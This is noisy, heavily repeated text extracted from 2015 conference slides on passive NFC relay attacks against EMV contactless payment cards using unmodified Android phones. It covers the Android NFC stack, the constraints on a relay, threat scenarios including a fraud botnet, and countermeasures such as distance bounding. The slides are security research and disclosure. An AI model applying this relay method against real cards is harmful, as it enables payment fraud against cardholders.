Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 3 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
